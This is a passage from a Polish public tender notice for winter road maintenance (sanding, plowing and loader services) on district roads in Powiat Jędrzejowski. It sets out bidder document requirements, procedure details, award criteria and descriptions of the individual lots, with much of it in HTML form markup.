4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 2, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Pkt 3 stosuje się.
5. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu
6. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w pkt 1 ppkt. 1.1.), składa dokument, o którym mowa w pkt 2 ppkt. 2.1., w zakresie określonym w art. 24 ust. 1 pkt 14 i 21 oraz ust. 5 pkt 6 ustawy Pzp. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby.  Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu:
1)	dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w          zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 500 000,00 złotych ( na okres co najmniej do końca 2016r. i gotowość do zachowania ciągłości ubezpieczenia przez cały okres obowiązywania umowy).
2)	wykaz wykonania usługi zimowego utrzymania dróg  w ciągu co najmniej jednego sezonu zimowego o wartości co najmniej 50 000,00 zł brutto każda (słownie: pięćdziesiąt tysięcy złotych brutto) wykonanych nie wcześniej niż w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane 
-zgodnie z Zał. nr 3.4. Zdolności  zawodowe.
3)	dla usługi ustawienia i zdjęcia siatki przeciwśnieżnej wykaz wykonania  tej usługi W ILOŚCI CO NAJMIEJ 18 KM w ciągu jednego sezonu zimowego, ale nie wcześniej niż w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane 
-zgodnie z Zał. nr 3.4. Zdolności  zawodowe.
4)	dowody określające czy usługi wykonane przez wykonawcę i wymienione w Zał. nr 3.4. Zdolności zawodowe  zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane.
5)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania przedmiotowego zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. W szczególności wykazanie, że dysponuje sprzętem, materiałami i innymi narzędziami niezbędnymi do realizacji przedmiotu zamówienia. 
W przypadku, gdy wykonawca składa ofertę na zadania, w których wymagane jest posiadanie własnego sprzętu, wówczas musi udowodnić, że dysponuje minimum jedną jednostką sprzętową dla każdego zadania, na które składa ofertę wraz z informacją o podstawie do dysponowania tymi zasobami.
Obowiązuje zasada: tyle jednostek sprzętowych ile złożonych ofert. Jeśli wykonawca składa ofertę na jedno zadanie  potrzebuje jedną jednostkę sprzętową; wykonawca składa ofertę na dwa zadania musi wykazać, że dysponuje dwoma jednostkami sprzętowymi itd. 
Oferta na jedno zadania = jedna jednostka sprzętowa, Oferty na dwa  zadania= dwie jednostki sprzętowe
wraz z informacją o podstawie do dysponowania sprzętem.
 Zał. nr 3.5. Zdolności techniczne;
6)	w przypadku gdy wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, zobowiązany jest złożyć zobowiązanie w formie 
- Zał. nr 3.6. zobowiązanie do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. W wyjątkowej sytuacji (długotrwałej, ciężkiej zimy) Zamawiający zastrzega możliwość wydłużenia terminu świadczenia usług oraz wcześniejsze rozpoczęcie prac przy zimowym utrzymaniu dróg.
2. W wyjątkowych sytuacjach np. wystąpienia gołoledzi na polecenie dyżurnego zimowego utrzymania dróg    odcinki do posypywania mogą zostać wydłużone.
3. Zamawiający w wyjątkowych sytuacjach zastrzega sobie prawo dysponowania zakontraktowanym sprzętem  na terenie całego Powiatu Jędrzejowskiego.
4. Usługi będą wykonywane na odcinkach dróg, które zostały wyszczególnione w wykaz dróg gminami z  określeniem standardów zimowego utrzymania i ich długości, który stanowi załącznik nr 2 do specyfikacji   istotnych warunków zamówienia i będzie integralną częścią umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/09/2016, godzina: 09:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim                   /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km
Zamawiający posiada pług średni odśnieżny typ PO 97W
Praca sprzętu dla Zadania 1-4 będzie obejmowała teren:
1.	Gminy Wodzisław  wszystkie drogi powiatowe na terenie gminy
2.	Gminy Sędziszów  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Słupia Jędrzejowska - wszystkie drogi powiatowe na terenie gminy
4.   Gmina Imielno - wszystkie drogi powiatowe na terenie gminy
5.   Gminy Jędrzejów  drogi powiatowe na terenie gminy z wyłączeniem:
- ulica powiatowa Przypkowskiego w Jędrzejowie   		
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków 
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Wodzisławiu.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMN PŁTNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim                   /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km
Zamawiający posiada pług odśnieżny typ PO 97D
Praca sprzętu dla Zadania 1-4 będzie obejmowała teren:
1.	Gminy Wodzisław  wszystkie drogi powiatowe na terenie gminy
2.	Gminy Sędziszów  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Słupia Jędrzejowska - wszystkie drogi powiatowe na terenie gminy
4.   Gmina Imielno - wszystkie drogi powiatowe na terenie gminy
5.   Gminy Jędrzejów  drogi powiatowe na terenie gminy z wyłączeniem:
- ulica powiatowa Przypkowskiego w Jędrzejowie   		
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków 
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Wodzisławiu.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim                         /własność wykonawcy/, plac, materiał zamawiającego - szt. 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km
Praca sprzętu dla Zadania 1-4 będzie obejmowała teren:
1.	Gminy Wodzisław  wszystkie drogi powiatowe na terenie gminy
2.	Gminy Sędziszów  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Słupia Jędrzejowska - wszystkie drogi powiatowe na terenie gminy
4.   Gmina Imielno - wszystkie drogi powiatowe na terenie gminy
5.   Gminy Jędrzejów  drogi powiatowe na terenie gminy z wyłączeniem:
- ulica powiatowa Przypkowskiego w Jędrzejowie   		
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków 
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Wodzisławiu.
      <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu pługo-piaskarki na nośniku średnim                         /własność wykonawcy/, plac, materiał zamawiającego - szt. 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km
Praca sprzętu dla Zadania 1-4 będzie obejmowała teren:
1.	Gminy Wodzisław  wszystkie drogi powiatowe na terenie gminy
2.	Gminy Sędziszów  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Słupia Jędrzejowska - wszystkie drogi powiatowe na terenie gminy
4.   Gmina Imielno - wszystkie drogi powiatowe na terenie gminy
5.   Gminy Jędrzejów  drogi powiatowe na terenie gminy z wyłączeniem:
- ulica powiatowa Przypkowskiego w Jędrzejowie   		
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków 
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Wodzisławiu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Usługi dotyczące zimowego utrzymania dróg wykonywane ładowarką o wydajności                   min 8 m3 /godz /własność wykonawcy/ - 1 szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 900 godzin.
Sprzęt w dyspozycji Obwodu Drogowego w Wodzisławiu<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim                   /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km.
Zamawiający posiada pług średni odśnieżny typ PO 97WU.
Praca sprzętu dla Zadania 6-10  będzie obejmowała teren:
1.	Gmina Małogoszcz  wszystkie drogi powiatowe na terenie gminy
2.	Gmina Oksa  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Nagłowice - wszystkie drogi powiatowe na terenie gminy
4.	Gmina Sobków - wszystkie drogi powiatowe na terenie gminy
5.	Gmina Jędrzejów:
- ulica powiatowa Przypkowskiego w Jędrzejowie   
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
- droga powiatowa nr 0164T odc. Wolica-Raków           
- droga powiatowa 0210T Węgleszyn-Tyniec-Prząsław do drogi nr 78
- droga powiatowa nr 0211T Chorzewa-Lasków
Teren i sprzęt w dyspozycji Obwodu Drogowego w Małogoszczu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Zwalczanie śliskości zimowej przy użyciu piaskarki na nośniku średnim                   /własność wykonawcy/, pług, materiał, plac /własność zamawiającego/ - 1 szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres robót wynosi 45 000 km.
Zamawiający posiada pług średni odśnieżny typ PO 97WU.
Praca sprzętu dla Zadania 6-10  będzie obejmowała teren:
1.	Gmina Małogoszcz  wszystkie drogi powiatowe na terenie gminy
2.	Gmina Oksa  wszystkie drogi powiatowe na terenie gminy
3.	Gmina Nagłowice - wszystkie drogi powiatowe na terenie gminy
4.	Gmina Sobków - wszystkie drogi powiatowe na terenie gminy
5.	Gmina Jędrzejów:
- ulica powiatowa Przypkowskiego w Jędrzejowie   
- droga powiatowa nr 0271T Wilanów-Lasków-Podchojny
- droga powiatowa nr 0149T do dr. Nr 728- Podchojny  dr. Nr 7   
- droga powiatowa nr 0160T odc. Raków-Gozna-Sobków
